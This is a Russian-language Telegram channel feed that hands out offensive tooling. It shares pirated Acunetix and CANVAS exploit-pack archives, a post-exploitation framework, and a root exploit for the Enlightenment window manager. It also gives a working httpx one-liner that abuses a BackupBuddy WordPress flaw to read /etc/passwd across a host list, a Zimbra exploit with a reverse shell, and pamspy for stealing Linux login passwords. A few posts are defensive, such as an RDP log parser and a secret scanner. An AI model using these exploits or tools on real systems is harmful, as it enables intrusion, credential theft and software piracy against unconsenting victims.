Forwarded from Proxy Bar (private)
Acunetix_14.9.220830118_linux_version.7z
250.3 MB
Linux version (august 2022)
Acunetix_14.9.220830118_windows_version.7z
197.8 MB
Windows Version (august 2022)
👍1
CANVAS_7.27+D2ExploitationPack_v2.55+WhitePhosphorus_1.28.7z
147 MB
Canvas exploitPack (version 7.27)
👍9
WhatWeb
Next generation web scanner
Жирнющий сканер, комбайн
Из интересного: Over 1800 plugins и столько же разработчиков 😜
Читаем, качаем, испытываем
#scanner #security
Next generation web scanner
Жирнющий сканер, комбайн
Из интересного: Over 1800 plugins и столько же разработчиков 😜
Читаем, качаем, испытываем
#scanner #security
👍15
Мы очень, очень рады, представить Вам ГЕРОИНН
Первый дозняк бесплатно !
так вот,
В общем берем инсулинку, Варим и пробуем тут
#framework
Первый дозняк бесплатно !
так вот,
Heroinn препарат кросс-платформенный и используется как post-exploitation framework
Прекурсором является RUST - который вызывает сильные привыкание (сильнее только python - запрещен в РФ)В общем берем инсулинку, Варим и пробуем тут
#framework
👍15😱6🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
ZeroDay в оконном менеджере Enlightenment
привелегии до rootпротестированно на ubuntu 22.04, в теории работает в любом дистре
Забрать готовый exploit
#exploit #linux #zeroday
👍10😱2
Wordpress vuln\CVE
plugin: BackupBuddy
*
Уже неделю активно используется для похека wordpress хостов
#wordpress #cve
plugin: BackupBuddy
*
cat hosts |httpx -noscript -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"*
Уже неделю активно используется для похека wordpress хостов
#wordpress #cve
🔥8👍5
Злой Putty, корейская морковка, работа_мечты_Amazon.iso и троян AIRDRY.V2'
Не понятно ? тогда читаем расследование от bleepingcomputer.com
Не понятно ? тогда читаем расследование от bleepingcomputer.com
👍7
CVE-2022-27925-zimbra_Revshell.zip
3.8 KB
Мы уже постили
Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋
exploit для CVE-2022-27925 (zimbra)Вот тот же сплоит, только с реализацией reverseShell (для ленивых)
😋
🔥6
админам на заметку:
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1
#windows #rdp
Как быстро раcпарсить RDP логи и понять как авторизовался удаленный юзер (kerberos или NTLM)
Download get-RdpLogonEvent.ps1
#windows #rdp
👍10
secretscanner.noscript
262.3 KB
SecretScanner
Ищем секреты в образах контейнеров или файловых системах.
*
Инструмент автономный, ищет контейнеры и файловые системы хоста, после чего сравнивает найденное с со своей базой данных, в которой на данный момент около 140 секретных типов
Download
#docker #security
Ищем секреты в образах контейнеров или файловых системах.
*
Инструмент автономный, ищет контейнеры и файловые системы хоста, после чего сравнивает найденное с со своей базой данных, в которой на данный момент около 140 секретных типов
Download
#docker #security
👍2
This media is not supported in your browser
VIEW IN TELEGRAM
pamspy - Воруем учетки в
*
pamspy подгружает пользовательскую программу eBPF, чтобы перехватить функцию
*
DOWNLOAD ——-> pamspy
#linux #pam
Linux используя eBPF
PAM модулями пользуются многие приложения для аутентификации (sudo, sshd, passwd и так далее), и статей по теме заBACKDOORивания PAM модулей в инете предостаточно.*
pamspy подгружает пользовательскую программу eBPF, чтобы перехватить функцию
pam_get_authtok из libpam.so. И каждый раз когда условный пользователь пытается пройти аутентификацию он дергает pam_get_authtok - тут то pamspy выдернет пароль !*
DOWNLOAD ——-> pamspy
#linux #pam
🔥2👍1
Cobalt Strike: и его payloads
Разбираемся что и как, анализируем и декодируем. Хорошая статья, рекомендую !
Read
#cobaltstrike
Разбираемся что и как, анализируем и декодируем. Хорошая статья, рекомендую !
Read
#cobaltstrike
👍1